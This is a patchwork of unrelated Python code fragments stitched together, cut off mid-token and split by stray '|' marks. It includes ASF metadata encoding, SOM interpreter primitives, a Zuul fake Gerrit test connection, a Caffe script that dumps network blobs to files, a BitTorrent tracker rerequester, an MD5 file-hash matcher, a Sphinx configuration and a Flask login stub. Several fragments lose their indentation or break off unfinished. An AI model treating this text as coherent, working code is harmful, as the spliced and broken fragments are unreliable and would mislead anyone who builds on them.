            return values[0].encode("utf-16-le") + b"\x00\x00"

        texts = [encode_field(name) for name in _standard_attribute_names]
        data = struct_pack("<HHHHH", *[len(t) for t in texts]) + b"".join(texts)
        return self.GUID + struct_pack("<Q", 24 + len(data)) + data
class Exten |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
[tests/stdlib/test_help.py]
Test the help command.
"""
import unittest
#import os
#f | rom ergonomica import ergo, ENV
class TestHelp(unittest.TestCase):
    """Tests the 'help' command."""
    def test_list_commands(self):
        """
        Tests listing all commands using the 'help commands' command.
        """
        # NOTE(review): no body follows the docstring, so this test is a no-op
        # that always passes -- presumably disabled along with the
        # commented-out ergonomica import above.  Confirm and implement.
| |
from som.interp_type import is_ast_interpreter
from som.primitives.primitives import Primitives
from som.vm.globals import trueObject, falseObject, nilObject
from som.vmobjects.primitive import UnaryPrimitive, BinaryPrimitive, TernaryPrimitive
if is_ast_interpreter():
from som.vmobjects.block_ast import AstBlock as _Block
else:
from som.vmobjects.block_bc import BcBlock as _Block
def _not(_rcvr):
    # True not -> false; the receiver (the true object) is ignored.
    return falseObject
def _or(_rcvr, _arg):
    # True or: anything -> true; the argument is never evaluated or used.
    return trueObject
def _and_and_if_true(_rcvr, arg):
    """Shared primitive for True's `and:`, `&&`, and `ifTrue:`.

    If *arg* is a block it is invoked and its result returned; any other
    value is returned unchanged.
    """
    if not isinstance(arg, _Block):
        return arg
    return arg.get_method().invoke_1(arg)
def _if_false(_rcvr, _arg):
    # True ifFalse: -> nil; the false-branch argument is never used.
    return nilObject
def _if_true_if_false(_rcvr, true_block, _false_block):
    """True ifTrue:ifFalse: -- only the true branch is ever taken.

    The true branch is invoked if it is a block, otherwise returned as-is;
    the false branch is ignored entirely.
    """
    if not isinstance(true_block, _Block):
        return true_block
    return true_block.get_method().invoke_1(true_block)
class TruePrimitivesBase(Primitives):
    """Installs the primitive operations understood by the True object."""

    def install_primitives(self):
        # Bind the installer locally; installation order matches the
        # original: not, or:, ||, and:, &&, ifTrue:, ifFalse:, ifTrue:ifFalse:.
        install = self._install_instance_primitive
        install(UnaryPrimitive("not", _not))
        install(BinaryPrimitive("or:", _or))
        install(BinaryPrimitive("||", _or))
        install(BinaryPrimitive("and:", _and_and_if_true))
        install(BinaryPrimitive("&&", _and_and_if_true))
        install(BinaryPrimitive("ifTrue:", _and_and_if_true))
        install(BinaryPrimitive("ifFalse:", _if_false))
        install(TernaryPrimitive("ifTrue:ifFalse:", _if_true_if_false))
|
mber": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"patchSet": self.patchsets[patchset - 1],
"author": {"name": "User Name"},
"approvals": [{"type": "Code-Review",
"description": "Code-Review",
"value": "0"}],
"comment": "This is a comment"}
return event
    def addApproval(self, category, value, username='reviewer_john',
                    granted_on=None, message=''):
        """Add (or replace) an approval vote on the newest patchset.

        Returns the resulting 'comment-added' Gerrit event as plain data
        (round-tripped through JSON) and refreshes submitRecords.
        """
        if not granted_on:
            granted_on = time.time()
        approval = {
            'description': self.categories[category][0],
            'type': category,
            'value': str(value),
            'by': {
                'username': username,
                'email': username + '@example.com',
            },
            'grantedOn': int(granted_on)
        }
        # Drop any earlier vote by the same user in the same category.
        # NOTE(review): iterating a copy while deleting from the live list by
        # index is only safe when at most one entry matches -- confirm.
        for i, x in enumerate(self.patchsets[-1]['approvals'][:]):
            if x['by']['username'] == username and x['type'] == category:
                del self.patchsets[-1]['approvals'][i]
        self.patchsets[-1]['approvals'].append(approval)
        event = {'approvals': [approval],
                 'author': {'email': 'author@example.com',
                            'name': 'Patchset Author',
                            'username': 'author_phil'},
                 'change': {'branch': self.branch,
                            'id': 'Iaa69c46accf97d0598111724a38250ae76a22c87',
                            'number': str(self.number),
                            'owner': {'email': 'owner@example.com',
                                      'name': 'Change Owner',
                                      'username': 'owner_jane'},
                            'project': self.project,
                            'subject': self.subject,
                            'topic': 'master',
                            'url': 'https://hostname/459'},
                 'comment': message,
                 'patchSet': self.patchsets[-1],
                 'type': 'comment-added'}
        self.data['submitRecords'] = self.getSubmitRecords()
        # JSON round-trip yields plain dicts/strings, as a real Gerrit event
        # stream would deliver.
        return json.loads(json.dumps(event))
def getSubmitRecords(self):
status = {}
for cat in self.categories.keys():
status[cat] = 0
for a in self.patchsets[-1]['approvals']:
cur = status[a['type']]
cat_min, cat_max = self.categories[a['type']][1:]
new = int(a['value'])
if new == cat_min:
cur = new
elif abs(new) > abs(cur):
cur = new
status[a['type']] = cur
labels = []
ok = True
for typ, cat in self.categories.items():
cur = status[typ]
cat_min, cat_max = cat[1:]
if cur == cat_min:
value = 'REJECT'
ok = False
elif cur == cat_max:
value = 'OK'
else:
value = 'NEED'
ok = False
labels.append({'label': cat[0], 'status': value})
if ok:
return [{'status': 'OK'}]
return [{'status': 'NOT_READY',
'labels': labels}]
    def setDependsOn(self, other, patchset):
        """Record that this change depends on patchset *patchset* (1-based)
        of change *other*, wiring up both directions of the link."""
        self.depends_on_change = other
        d = {'id': other.data['id'],
             'number': other.data['number'],
             'ref': other.patchsets[patchset - 1]['ref']
             }
        self.data['dependsOn'] = [d]
        # Mirror the reverse relationship on the other change.
        other.needed_by_changes.append(self)
        needed = other.data.get('neededBy', [])
        d = {'id': self.data['id'],
             'number': self.data['number'],
             'ref': self.patchsets[patchset - 1]['ref'],
             'revision': self.patchsets[patchset - 1]['revision']
             }
        needed.append(d)
        other.data['neededBy'] = needed
def query(self):
self.queried += 1
d = self.data.get('dependsOn')
if d:
d = d[0]
if (self.depends_on_change.patchsets[-1]['ref'] == d['ref']):
d['isCurrentPatchSet'] = True
else:
d['isCurrentPatchSet'] = False
return json.loads(json.dumps(self.data))
    def setMerged(self):
        """Mark this change merged and advance the fake upstream repo.

        No-op if an unmerged dependency exists or fail_merge is set.
        """
        if (self.depends_on_change and
            self.depends_on_change.data['status'] != 'MERGED'):
            return
        if self.fail_merge:
            return
        self.data['status'] = 'MERGED'
        self.open = False
        # Simulate Gerrit submitting: point the branch head in the fake
        # upstream repository at this change's newest patchset commit.
        path = os.path.join(self.upstream_root, self.project)
        repo = git.Repo(path)
        repo.heads[self.branch].commit = \
            repo.commit(self.patchsets[-1]['revision'])
def setReported(self):
self.reported += 1 |
class FakeGerritConnection(zuul.connection.gerrit.GerritConnection):
    """In-memory stand-in for a Gerrit connection used by the tests.

    Changes live in the shared `changes_db` mapping and events are delivered
    through `queues_db` instead of a real SSH event stream.
    """
    log = logging.getLogger("zuul.test.FakeGerritConnection")
    def __init__(self, connection_name, connection_config,
                 changes_db=None, queues_db=None, upstream_root=None):
        super(FakeGerritConnection, self).__init__(connection_name,
                                                   connection_config)
        self.event_queue = queues_db
        self.fixture_dir = os.path.join(FIXTURE_DIR, 'gerrit')
        # Monotonic counter for allocating change numbers.
        self.change_number = 0
        self.changes = changes_db
        # Record of every simpleQuery string, for test assertions.
        self.queries = []
        self.upstream_root = upstream_root
    def addFakeChange(self, project, branch, subject, status='NEW'):
        # Allocate the next change number and register a new fake change.
        self.change_number += 1
        c = FakeChange(self, self.change_number, project, branch, subject,
                       upstream_root=self.upstream_root,
                       status=status)
        self.changes[self.change_number] = c
        return c
    def review(self, project, changeid, message, action):
        # changeid is "<number>,<patchset>".
        number, ps = changeid.split(',')
        change = self.changes[int(number)]
        # Add the approval back onto the change (ie simulate what gerrit would
        # do).
        # Usually when zuul leaves a review it'll create a feedback loop where
        # zuul's review enters another gerrit event (which is then picked up by
        # zuul). However, we can't mimic this behaviour (by adding this
        # approval event into the queue) as it stops jobs from checking what
        # happens before this event is triggered. If a job needs to see what
        # happens they can add their own verified event into the queue.
        # Nevertheless, we can update change with the new review in gerrit.
        # NOTE(review): self.user is not set in __init__ here -- presumably
        # provided by the base GerritConnection; confirm.
        for cat in ['CRVW', 'VRFY', 'APRV']:
            if cat in action:
                change.addApproval(cat, action[cat], username=self.user)
        if 'label' in action:
            parts = action['label'].split('=')
            # NOTE(review): parts[2] assumes a three-part "name=x=value"
            # label string; a plain "Label=value" would raise IndexError --
            # confirm the expected format with callers.
            change.addApproval(parts[0], parts[2], username=self.user)
        change.messages.append(message)
        if 'submit' in action:
            change.setMerged()
        if message:
            change.setReported()
    def query(self, number):
        # Return the change's data, or an empty dict for unknown numbers.
        change = self.changes.get(int(number))
        if change:
            return change.query()
        return {}
    def simpleQuery(self, query):
        """Answer a subset of Gerrit query syntax: 'change:<id>',
        'message:<text>', or anything else meaning all open changes."""
        self.log.debug("simpleQuery: %s" % query)
        self.queries.append(query)
        if query.startswith('change:'):
            # Query a specific changeid
            changeid = query[len('change:'):]
            l = [change.query() for change in self.changes.values()
                 if change.data['id'] == changeid]
        elif query.startswith('message:'):
            # Query the content of a commit message
            msg = query[len('message:'):].strip()
            l = [change.query() for change in self.changes.values()
                 if msg in change.data['commitMessage']]
        else:
            # Query all open changes
            l = [change.query() for change in self.changes.values()]
        return l
    def _start_watcher_thread(self, *args, **kw):
        # The real connection starts an SSH event-stream watcher; the tests
        # inject events directly, so this is a no-op.
        pass
    def getGitUrl(self, project):
        # Git URLs point into the fake upstream directory tree.
        return os.path.join(self.upstream_root, project.name)
class |
"""
Load an image from disk
Returns an np.ndarray (channels x width x height)
Arguments:
path -- path to an image on disk
width -- resize dimension
height -- resize dimension
Keyword arguments:
mode -- the PIL mode that the image should be converted to
(RGB for color or L for grayscale)
"""
image = PIL.Image.open(path)
image = image.convert(mode)
image = np.array(image)
# half-crop, half-fill
height_ratio = float(image.shape[0])/height
width_ratio = float(image.shape[1])/width
new_ratio = (width_ratio + height_ratio) / 2.0
resize_width = int(round(image.shape[1] / new_ratio))
resize_height = int(round(image.shape[0] / new_ratio))
if width_ratio > height_ratio and (height - resize_height) % 2 == 1:
resize_height += 1
elif width_ratio < height_ratio and (width - resize_width) % 2 == 1:
resize_width += 1
image = scipy.misc.imresize(image, (resize_height, resize_width), interp='bicubic')
if width_ratio > height_ratio:
start = int(round((resize_width-width)/2.0))
image = image[:,start:start+width]
else:
start = int(round((resize_height-height)/2.0))
image = image[start:start+height,:]
# fill ends of dimension that is too short with random noise
if width_ratio > height_ratio:
padding = (height - resize_height)/2
noise_size = (padding, width, 3)
noise = np.random.randint(0, 255, noise_size).astype('uint8')
image = np.concatenate((noise, image, noise), axis=0)
else:
padding = (width - resize_width)/2
noise_size = (height, padding, 3)
noise = np.random.randint(0, 255, noise_size).astype('uint8')
image = np.concatenate((noise, image, noise), axis=1)
processed = np.zeros((3, width, height), np.float32)
# Transpose from (height, width, channels) to (channels, height, width)
#processed = processed.transpose((2,0,1))
# Channel Swap: RGB -> BGR
#image = image[(2,1,0),:,:]
# Subtract Mean, Swap Channels RGB -> BGR, Transpose (H,W,CH) to (CH,H,W)
#mean_rgb = [104,117,123]
processed[0,:,:] = (image[:,:,2]-104.0)
processed[1,:,:] = (image[:,:,1]-117.0)
processed[2,:,:] = (image[:,:,0]-123.0)
return processed
def forward_pass(image, net, batch_size=None):
    """
    Run one preprocessed image through the network and return a copy of
    the final output blob's scores as an np.ndarray.

    Arguments:
    image -- a preprocessed np.ndarray (channels x height x width)
    net -- a caffe.Net

    Keyword arguments:
    batch_size -- unused; kept for interface compatibility
    """
    # Place the single image into slot 0 of the input blob.
    net.blobs['data'].data[0] = image
    print "net.outputs[-1] = ", net.outputs[-1]
    start = time.time()
    net.forward()
    # Scores come from the network's last output blob.
    output = net.blobs[net.outputs[-1]].data
    #pool10avg = (net.blobs['pool10'].data).flatten()
    #pool10 = pool10avg
    #print "conv10 output:\n", net.blobs['conv10'].data
    #print "pool10 output:", pool10avg
    # Copy so later forward passes cannot mutate the returned array.
    scores = np.copy(output)
    end = time.time()
    print 'Inference took %f seconds ...' % (end - start)
    return scores
def read_labels(labels_file):
    """
    Returns a list of strings

    Arguments:
    labels_file -- path to a .txt file (falsy value returns None)
    """
    if not labels_file:
        return None
    with open(labels_file) as infile:
        # Keep each line stripped of surrounding whitespace, skipping blanks.
        labels = [text for text in (line.strip() for line in infile) if text]
    assert len(labels), 'No labels found'
    return labels
def classify(caffemodel, deploy_file, image_file,
mean_file=None, labels_file=None, batch_size=None, use_gpu=True):
"""
Classify some images against a Caffe model and print the results
Arguments:
caffemodel -- path to a .caffemodel
deploy_file -- path to a .prototxt
image_files -- list of paths to images
Key | word arguments:
mean_file -- path to a .binaryproto
labels_file path to a .txt file
use_gpu -- if True, run inference on the GPU
"""
# Load the model and images
net = get_net(caffemodel, deploy_file, use_gpu)
_, channels, height, width = np.array(net.blobs['data'].shape)
mode = 'RGB'
image = load_image(image_file, height, width, mode)
labels = read_labels(labels_file)
# Structured Input as Image
#W = image.shape[2]
#H = image.shape[1]
#CH = image.shape[0]
#for y in range(H):
# for x in range(W):
# for c in range(CH):
# image[c,x,y] = 1000.0*y+x+c/1000.0#1;
#
# Fixed Parameters for first Filter Bank
# conv1param = np.array(net.params['conv1'][0].data)[:,:,:,:]
# print "shape of conv1param: ", conv1param.shape
# co = conv1param.shape[0]
# ci = conv1param.shape[1]
# kx = conv1param.shape[2]
# ky = conv1param.shape[3]
# pixels = []
# for i in range(ci):
# for o in range(co):
# if i == 0:
# conv1param[o,i] = np.array([[0,0,0],[0,1,0],[0,0,0]])
# else:
# conv1param[o,i] = np.zeros((3,3)) #conv1param[o,i] = np.array([[1,0,0],[0,1,0],[0,1,0]])
#net.params['conv1'][0].data[...] = conv1param
#net.params['conv1'][1].data[...] = np.zeros(net.params['conv1'][1].shape)
# Classify the image
scores = forward_pass(image, net, batch_size=1)
# Fish out some blobs...
indata = np.array(net.blobs['data'].data)[0,:,:,:]
print "shape of indata: ", indata.shape
CH = indata.shape[0]
W = indata.shape[1]
H = indata.shape[2]
pixels = []
for y in range(H):
for x in range(W):
for c in range(CH):
pixel = indata[c,x,y]
if pixel is None: pixel = 99999
pixels.append(pixel);
# Write Pixels to binary file
print("Write to indata File...")
floatstruct = struct.pack('f'*len(pixels), *pixels)
with open("indata.bin", "wb") as f:
f.write(floatstruct)
# Fish out some Parameters...
conv1param = np.array(net.params['conv1'][0].data)[:,:,:,:]
print "shape of conv1param: ", conv1param.shape
co = conv1param.shape[0]
ci = conv1param.shape[1]
kx = conv1param.shape[2]
ky = conv1param.shape[3]
print "conv1 (ci 0, co 0):\n", conv1param[0,0,:,:]
print "conv1 (ci 1, co 0):\n", conv1param[0,1,:,:]
print "conv1 (ci 2, co 0):\n", conv1param[0,2,:,:]
pixels = []
for i in range(ci):
for o in range(co):
for y in range(ky):
for x in range(kx):
pixels.append(conv1param[o,i,x,y]);
# Write Pixels to binary file
print("Write to conv1param File...")
floatstruct = struct.pack('f'*len(pixels), *pixels)
with open("conv1param.bin", "wb") as f:
f.write(floatstruct)
# Fish out some blobs...
conv1res = np.array(net.blobs['conv1'].data)[0,:,:,:]
print "shape of conv1 results: ", conv1res.shape
W = conv1res.shape[2]
H = conv1res.shape[1]
CH = conv1res.shape[0]
pixels = []
for y in range(H):
for x in range(W):
for c in range(CH):
pixels.append(conv1res[c,x,y]);
# Write Pixels to binary file
print("Write to conv1res File...")
floatstruct = struct.pack('f'*len(pixels), *pixels)
with open("conv1res.bin", "wb") as f:
f.write(floatstruct)
# Fish out fire2/sq1x1 blobs...
d = np.array(net.blobs['fire2/squeeze1x1'].data)[0,:,:,:]
print "shape of fire2/squeeze1x1 results: ", d.shape
W = d.shape[2]
H = d.shape[1]
CH = d.shape[0]
pixels = []
for y in range(H):
for x in range(W):
for c in range(CH):
pixels.append(d[c,x,y]);
# Write Pixels to binary file
print("Write to f2s1 File...")
floatstruct = struct.pack('f'*len(pixels), *pixels)
with open("f2s1.bin", "wb") as f:
f.write(floatstruct)
# Fish out fire2/ex1x1 blobs...
d = np.array(net.blob |
bencode import bdecode
from threading import Thread, Lock
from socket import error, gethostbyname
from time import time
from random import randrange
from binascii import b2a_hex
class Rerequester:
    def __init__(self, url, interval, sched, howmany, minpeers,
            connect, externalsched, amount_left, up, down,
            port, ip, myid, infohash, timeout, errorfunc, maxpeers, doneflag,
            upratefunc, downratefunc, ever_got_incoming):
        """Build the base announce URL and record the scheduler callbacks and
        statistics accessors used for all tracker communication."""
        # The URL and query parameters to always pass.
        self.url = ('%s?info_hash=%s&peer_id=%s&port=%s&key=%s' %
            (url, quote(infohash), quote(myid), str(port),
            b2a_hex(''.join([chr(randrange(256)) for i in xrange(4)]))))
        # The IP address of this client.
        self.ip = ip
        # The time in seconds between requesting more peers.
        self.interval = interval
        # The last time this client got a reply from the tracker.
        self.last = None
        # The identifier returned by the tracker, which this client uses on subsequent requests.
        self.trackerid = None
        # Maximum seconds between sending requests to the tracker.
        self.announce_interval = 30 * 60
        # Function to schedule events in the reactor loop of RawServer.
        self.sched = sched
        # Method that returns how many peers this client is connected to.
        self.howmany = howmany
        # If connected to this many peers, may skip making a request to the tracker.
        self.minpeers = minpeers
        # Method on Connecter that starts a connection to a peer.
        self.connect = connect
        # Function to schedule events in the reactor loop of RawServer.
        self.externalsched = externalsched
        # Method to get the amount of data left.
        self.amount_left = amount_left
        # Method to get the total bytes uploaded.
        self.up = up
        # Method to get the total bytes downloaded.
        self.down = down
        # HTTP timeout when making a request to the tracker.
        self.timeout = timeout
        # Callback invoked with a string describing any error.
        self.errorfunc = errorfunc
        # If connected to this many peers, will not request any more from the tracker.
        self.maxpeers = maxpeers
        # Flag set if we have all pieces and are seeding.
        self.doneflag = doneflag
        # Method to get the upload rate.
        self.upratefunc = upratefunc
        # Method to get the download rate.
        self.downratefunc = downratefunc
        # Method that returns True if we ever got an incoming connection.
        self.ever_got_incoming = ever_got_incoming
        # True if the last request to the tracker failed.
        self.last_failed = True
        # The last time this client made a request to the tracker.
        self.last_time = 0
    def c(self):
        """Periodic callback: reschedule itself and announce if more peers
        are needed or the announce interval has elapsed."""
        # Call this method again later.
        self.sched(self.c, self.interval)
        # Determine if we need more peers from the tracker.
        if self.ever_got_incoming():
            # Got an incoming connection.
            getmore = self.howmany() <= self.minpeers / 3
        else:
            # Never got an incoming connection.
            # Assume this client is behind a NAT, and aggressively try and connect to other peers.
            getmore = self.howmany() < self.minpeers
        if getmore or time() - self.last_time > self.announce_interval:
            # Need to connect to more peers, or need to simply check-in with the tracker.
            self.announce()
    def begin(self):
        """Start periodic tracker contact and announce the 'started' event."""
        # Method c is the method called at regular intervals to contact the tracker.
        self.sched(self.c, self.interval)
        # But contact the tracker now. Setting event = 0 specifies starting the download.
        self.announce(0)
    def announce(self, event = None):
        """Build the full announce URL and issue the request on a worker
        thread, with a timeout watchdog scheduled in the reactor.

        event indexes ['started', 'completed', 'stopped']; None means a
        routine periodic update.
        """
        # Update the time we last made a request to the tracker.
        self.last_time = time()
        # Append total uploaded, total downloaded, and bytes left to download.
        s = ('%s&uploaded=%s&downloaded=%s&left=%s' %
            (self.url, str(self.up()), str(self.down()),
            str(self.amount_left())))
        if self.last is not None:
            # Append the last time this client made a request to the tracker.
            s += '&last=' + quote(str(self.last))
        if self.trackerid is not None:
            # If not the first request, append the id this tracker previously returned.
            s += '&trackerid=' + quote(str(self.trackerid))
        if self.howmany() >= self.maxpeers:
            # Don't need any more peers to connect to.
            s += '&numwant=0'
        else:
            # Return peer IP and port addresses in 6 binary bytes.
            s += '&compact=1'
        # Event is not specified if this request is one performed at regular intervals.
        if event != None:
            s += '&event=' + ['started', 'completed', 'stopped'][event]
        # Method that returns True the first time and False every subsequent time.
        set = SetOnce().set
        def checkfail(self = self, set = set):
            if set():
                # Only get here if the tracker did not reply and call set() in rerequest first.
                if self.last_failed and self.upratefunc() < 100 and self.downratefunc() < 100:
                    self.errorfunc('Problem connecting to tracker - timeout exceeded')
                self.last_failed = True
        # Method checkfail will run if the tracker does not reply to this request.
        self.sched(checkfail, self.timeout)
        Thread(target = self.rerequest, args = [s, set]).start()
    def rerequest(self, url, set):
        """Perform the HTTP request to the tracker (runs in a worker thread).

        url is the fully-built announce URL from announce(); set is the
        one-shot guard shared with the checkfail timeout handler, ensuring
        exactly one of success/failure/timeout handling runs.
        """
        # url is s from method announce.
        try:
            if self.ip:
                # Include our IP address in case we are communicating through a proxy.
                url += '&ip=' + gethostbyname(self.ip)
            # Read a reply.
            h = urlopen(url)
            r = h.read()
            h.close()
            if set():
                # Only get here if checkfail did not run and call set() first.
                def add(self = self, r = r):
                    # This call succeeded.
                    self.last_failed = False
                    # Process the reply.
                    self.postrequest(r)
                self.externalsched(add, 0)
        except (IOError, error), e:
            if set():
                # Only get here if checkfail did not run and call set() first.
                def fail(self = self, r = 'Problem connecting to tracker - ' + str(e)):
                    if self.last_failed:
                        self.errorfunc(r)
                    self.last_failed = True
                self.externalsched(fail, 0)
def postrequest(self, data):
try:
r = bdecode(data)
check_peers(r)
if r.has_key('failure reason'):
self.errorfunc('rejected by tracker - ' + r['failure reason'])
else:
if r.has_key('warning message'):
self.errorfunc('warning from tracker - ' + r['warning message'])
self.announce_interval = r.get('interval', self.announce_interval)
self.interval = r.get('min interval', self.interval)
self.trackerid = r.get('tracker id', self.trackerid)
self.last = r.get('last')
p = r['peers']
peers = []
if type(p) == type(''):
# Deserialize the compact binary form.
for x in xrange(0, len(p), 6):
ip = '.'.join([str(ord(i)) for i in p[x:x+4]])
port = (ord(p[x+4]) << 8) | ord(p[x+5])
peers.append((ip, port, None))
else:
for x in p:
peers.append((x['ip'], x['port'], x.get('peer id')))
ps = len(peers) + self.howmany()
if ps < self.maxpeers:
if self.doneflag.isSet():
if r.get('num peers', 1000) - r.get('done peers', 0) > ps * 1.2:
self.last = |
# -*- coding: utf-8 -*-
# Author : Republic of Korea, Seoul, JungSan HS 31227 Lee Joon Sung
# Author_Helper : Republic of Korea, Gyeonggi-do, Kim Min Seok
# youtube : anonymous0korea0@gmail.com | ;;;; tayaka
# Email : miho0_0@naver.com
import hashlib
import logging
#from FoxDBinfor | import DB_Pattern
def Matching_Hash_Value(fname, File_Hash_List):
    """Return 1 if the MD5 of file *fname* appears in File_Hash_List, else 0.

    Returns None (after logging) when the file cannot be read.
    """
    logger = logging.getLogger("FoxVc")
    try:
        with open(fname, 'rb') as f:
            buf = f.read()
        fmd5 = hashlib.md5(buf).hexdigest()
        # Membership test replaces the previous manual scan over the list.
        return 1 if fmd5 in File_Hash_List else 0
    except IOError as e:
        logger.error("IOError : Permission denied. / No such file or directory.")
        # str(e) instead of e.message: exceptions have no .message attribute
        # on Python 3, which made the old handler raise AttributeError.
        logger.error(str(e))
|
# -*- c | oding: utf-8 -*-
# Package version string.
__version__ = '1.1.0'
# Dotted path Django uses to locate this app's configuration class
# (the default_app_config convention).
default_app_config = 'ipware.apps.AppConfig'
|
import os

# Generate a .modulerc file hiding every module version found in the
# subdirectories of this script's own directory.
root_dir = os.path.dirname(os.path.realpath(__file__))

# `with` guarantees the file is flushed and closed (the old code never
# closed the handle).
with open(".modulerc", "w") as modulerc:
    modulerc.write("#%Module\n")
    sub_dirs = os.walk(root_dir)
    next(sub_dirs)  # skip the root directory itself; versions live one level down
    for dir_name, _, file_list in sub_dirs:
        for file_name in file_list:
            # Strip a trailing ".lua" extension exactly once.  The previous
            # file_name.rstrip(".lua") removed any trailing RUN of the
            # characters '.', 'l', 'u', 'a' (e.g. "2.1.all.lua" -> "2.1"),
            # corrupting version names.
            if file_name.endswith(".lua"):
                module_version = file_name[:-len(".lua")]
            else:
                module_version = file_name
            module_name = os.path.relpath(dir_name, root_dir)
            modulerc.write("hide-version %s/%s\n" % (module_name, module_version))
xecfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import alabaster
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.3'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# -- Sphinx build configuration (fragment) ----------------------------------
# NOTE(review): stray extraction artifacts ("... rend | ered ...", a lone '|'
# line, and a truncated trailing comment) were removed/restored below.
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ecstasy'
copyright = u'2015, Peter Goldsborough'
author = u'Peter Goldsborough'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1'
# The full version, including alpha/beta/rc tags.
release = '1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
    'github_user': 'goldsborough',
    'github_repo': 'ecstasy',
    'github_banner': True,
    'travis_button': "true",
    'gratipay_user': "goldsborough",
    'extra_nav_links': {"Github Repository": "github.com/goldsborough/ecstasy"}
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [alabaster.get_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "ecstasy"
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
#   'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
#   'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'ecstasydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'ecstasy.tex', u'ecstasy Documentation',
     u'Peter Goldsborough', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
''' Initiation procedure for the auth module

Yields:
    - Initiates the Login Manager
'''
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
from flask_login import LoginManager
from .. import app
# ---------------------------------------------------------------------------
# Define and Configure the login manager
